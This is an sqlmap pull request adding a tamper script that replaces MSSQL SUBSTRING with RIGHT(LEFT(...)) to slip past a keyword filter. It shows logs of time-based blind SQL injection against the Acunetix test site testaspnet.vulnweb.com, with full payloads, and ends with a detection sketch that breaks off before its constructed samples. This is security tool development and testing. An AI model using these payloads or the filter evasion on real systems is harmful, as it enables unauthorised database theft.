[tamper request] Replacing SUBSTRING by LEFT and RIGHT #2883
I found that the MSSQL SUBSTRING function was blocked by some kind of security control, so I've used other substring-like MSSQL functions instead (LEFT and RIGHT).
Test run (verbose suppressed)
root@kali:~# sqlmap -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --threads 10 --dbs
(…snip…)
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=3;WAITFOR DELAY '0:0:5'--
[11:48:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:48:48] [INFO] testing Microsoft SQL Server
[11:48:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[11:48:55] [INFO] confirming Microsoft SQL Server
[11:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[11:49:18] [INFO] fetching database names
[11:49:18] [INFO] fetching number of databases
[11:49:18] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:49:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
1
[11:49:57] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:50:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:50:42] [INFO] retrieved: acublog
[11:52:40] [INFO] retrieved: master
[11:54:22] [INFO] retrieved: tempdb
[11:56:29] [INFO] retrieved: model
[11:58:13] [INFO] retrieved: ms
[11:59:26] [ERROR] invalid character detected. retrying..
[11:59:26] [WARNING] increasing time delay to 6 seconds
db
[12:00:02] [INFO] retrieved: acublog
[12:02:21] [INFO] retrieved: acuservice
[12:05:21] [INFO] retrieved: acuf
[12:06:48] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[12:06:49] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[12:06:49] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
orum
[12:09:55] [INFO] retrieved:
available databases [7]:
[*] acublog
[*] acuforum
[*] acuservice
[*] master
[*] model
[*] msdb
[*] tempdb
[12:09:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:09:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
Test run
root@kali:~# sqlmap -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --current-user -v3
(...snip...)
[12:26:56] [INFO] fetching current user
[12:26:56] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:4'
[12:27:01] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:4'
[12:27:08] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>108) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>106) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>105) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=105) WAITFOR DELAY '0:0:4'
[12:27:14] [ERROR] invalid character detected. retrying..
[12:27:14] [WARNING] increasing time delay to 5 seconds
[12:27:14] [DEBUG] turning off time auto-adjustment mechanism
[12:27:14] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:5'
[12:27:19] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:24] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>97) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=97) WAITFOR DELAY '0:0:5'
[12:27:27] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>99) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))!=99) WAITFOR DELAY '0:0:5'
[12:27:39] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:44] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:49] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>120) WAITFOR DELAY '0:0:5'
[12:27:50] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>116) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>118) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))!=117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:01] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:02] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:07] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>108) WAITFOR DELAY '0:0:5'
[12:28:12] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>110) WAITFOR DELAY '0:0:5'
[12:28:13] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>109) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))!=110) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>100) WAITFOR DELAY '0:0:5'
[12:28:29] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>102) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))!=101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:36] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>120) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>116) WAITFOR DELAY '0:0:5'
[12:28:42] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>114) WAITFOR DELAY '0:0:5'
[12:28:47] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>115) WAITFOR DELAY '0:0:5'
[12:28:52] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))!=116) WAITFOR DELAY '0:0:5'
[12:28:53] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>104) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>108) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>106) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))!=105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:10] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>112) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>120) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>116) WAITFOR DELAY '0:0:5'
[12:29:21] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>118) WAITFOR DELAY '0:0:5'
[12:29:27] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>119) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))!=120) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>48) WAITFOR DELAY '0:0:5'
[12:29:33] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>1) WAITFOR DELAY '0:0:5'
[12:29:33] [INFO] retrieved: acunetix
[12:29:33] [DEBUG] performed 68 queries in 156.57 seconds
current user: 'acunetix'
[12:29:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:29:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
[*] shutting down at 12:29:33
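A control that blocks only the `SUBSTRING` keyword misses the `RIGHT(LEFT(x, n), 1)` form visible in the `-v3` payloads above. The following is an added detection sketch, not code from this pull request or from sqlmap: it parses call nesting so that both spellings of a single-character read are flagged, along with the `WAITFOR DELAY` timing oracle. The function names and the two constructed samples are assumptions; the first sample is copied from the log.

```python
import re
from urllib.parse import unquote_plus

CALL = re.compile(r"\b([A-Za-z_]+)\s*\(")
DELAY = re.compile(r"\bWAITFOR\s+DELAY\b", re.I)

def split_args(text, open_idx):
    """Top-level arguments of the call whose '(' is at open_idx (None if unbalanced)."""
    args, depth, start, in_str = [], 0, open_idx + 1, False
    for i in range(open_idx, len(text)):
        ch = text[i]
        if ch == "'":
            in_str = not in_str          # '' inside a literal toggles twice
        elif in_str:
            continue
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return args + [text[start:i].strip()]
        elif ch == "," and depth == 1:
            args.append(text[start:i].strip())
            start = i + 1
    return None

def char_extractions(sql):
    """List (form, position) for every expression that reads exactly one character."""
    found = []
    for m in CALL.finditer(sql):
        name, args = m.group(1).upper(), split_args(sql, m.end() - 1) or []
        if name in ("SUBSTRING", "SUBSTR", "MID") and len(args) == 3 and args[2] == "1":
            found.append((name, args[1]))
        elif name == "RIGHT" and len(args) == 2 and args[1] == "1":
            # RIGHT(LEFT(x, n), 1) reads the same character as SUBSTRING(x, n, 1)
            # whenever n <= LEN(x).
            inner = CALL.match(args[0])
            if inner and inner.group(1).upper() == "LEFT":
                inner_args = split_args(args[0], inner.end() - 1)
                if inner_args and len(inner_args) == 2:
                    found.append(("RIGHT(LEFT)", inner_args[1]))
    return found

def classify(param_value):
    sql = unquote_plus(param_value)
    hits = char_extractions(sql)
    return {"char_extract": sorted({f for f, _ in hits}),
            "positions": [p for _, p in hits],
            "time_delay": bool(DELAY.search(sql))}

# Copied from the -v3 log above (the probe for character position 2).
PAGE_PAYLOAD = ("3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS "
                "NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL("
                "CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) "
                "WAITFOR DELAY '0:0:5'")
# Constructed samples: the untampered form, and a benign use of RIGHT.
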